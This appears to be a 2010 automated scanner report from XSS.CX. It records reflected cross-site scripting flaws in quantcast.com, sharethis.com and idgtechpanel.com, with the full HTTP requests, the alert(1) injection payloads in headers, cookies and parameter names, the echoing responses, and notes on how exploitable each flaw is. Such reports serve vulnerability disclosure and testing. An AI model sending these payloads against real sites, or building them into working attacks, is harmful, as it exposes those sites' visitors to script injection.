HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 16 Dec 2010 13:16:45 GMT Expires: Wed, 15 Dec 2010 01:16:45 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=0|76|1292505405733|0|NOTSET; Expires=Sat, 08-Dec-2040 13:16:45 GMT; Path=/ Set-Cookie: JSESSIONID=DDA567C2C52828645BFF387C4D18D863; Path=/ Set-Cookie: qcPageID="10.122.9.111,8006,81,Thu, 16 Dec 2010 13:16:45 UTC"; Version=1; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29ca"><script>alert(1)</script>c4c6cd67bee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-34PxbSficBeTc HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d29ca"><script>alert(1)</script>c4c6cd67bee
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 16 Dec 2010 13:16:46 GMT Expires: Wed, 15 Dec 2010 01:16:46 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=0|60|1292505406778|0|NOTSET; Expires=Sat, 08-Dec-2040 13:16:46 GMT; Path=/ Set-Cookie: JSESSIONID=540EC469CF63870D060AE0FBE211F04A; Path=/ Set-Cookie: qcPageID="10.122.9.115,8004,75,Thu, 16 Dec 2010 13:16:46 UTC"; Version=1; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 30389 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1171"><script>alert(1)</script>e63771cde2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-fcYWUmj5YbYKM HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e1171"><script>alert(1)</script>e63771cde2c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 16 Dec 2010 13:16:45 GMT Expires: Wed, 15 Dec 2010 01:16:46 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=0|30|1292505406486|0|NOTSET; Expires=Sat, 08-Dec-2040 13:16:46 GMT; Path=/ Set-Cookie: JSESSIONID=B03A2A24BB4021EA9B80B4EA43966597; Path=/ Set-Cookie: qcPageID="10.122.9.112,8002,82,Thu, 16 Dec 2010 13:16:46 UTC"; Version=1; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 44018 Connection: close
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload a77ef<script>alert(1)</script>d04369783ff was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php HTTP/1.1 Host: seg.sharethis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==a77ef<script>alert(1)</script>d04369783ff;
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Thu, 16 Dec 2010 14:15:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Content-Length: 639
<html> <head><title>ShareThis Segmenter</title></head> <body> <script type="text/javascript"> var google_conversion_id = 1036609180; var google_conversion_language = "en"; var goo ...[SNIP]... <div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==a77ef<script>alert(1)</script>d04369783ff userid: </div> ...[SNIP]...
2.437. http://www.idgtechpanel.com/ [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.idgtechpanel.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb01"-alert(1)-"d86887c70de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ecb01"-alert(1)-"d86887c70de=1 HTTP/1.1 Host: www.idgtechpanel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.0 302 Found Date: Thu, 16 Dec 2010 13:31:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.4 Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Location: /?ecb01"-alert(1)-"d86887c70de=1 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ca6d2el2sh2g05ci74dsrjbu26; path=/ Set-Cookie: PL=NTk%3D; path=/ Set-Cookie: pshld=a%3A2%3A%7Bs%3A3%3A%22val%22%3Bs%3A32%3A%228d965d790b3ab4727548aca749d9b6a7%22%3Bs%3A2%3A%22ts%22%3Bi%3A1292506282%3B%7D; expires=Wed, 11-Dec-2030 13:31:22 GMT; path=/ Set-Cookie: SERVERID=SB3; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta content="text/html; charse ...[SNIP]... <script type="text/javascript" language="javascript">var aLObj={divclass:'anylinkmenu', inlinestyle:'', linktarget:''};aLObj.items=[["......", "/?ecb01"-alert(1)-"d86887c70de=1&L=1"],["Deutsch", "/?ecb01"-alert(1)-"d86887c70de=1&L=4"],["Español", "/?ecb01"-alert(1)-"d86887c70de=1&L=10"],["Français", "/?ecb01"-alert(1)-"d86887c70de=1&L=3"],["Italiano", "/?ecb0 ...[SNIP]...
Report generated by XSS.CX at Thu Dec 16 09:40:33 CST 2010.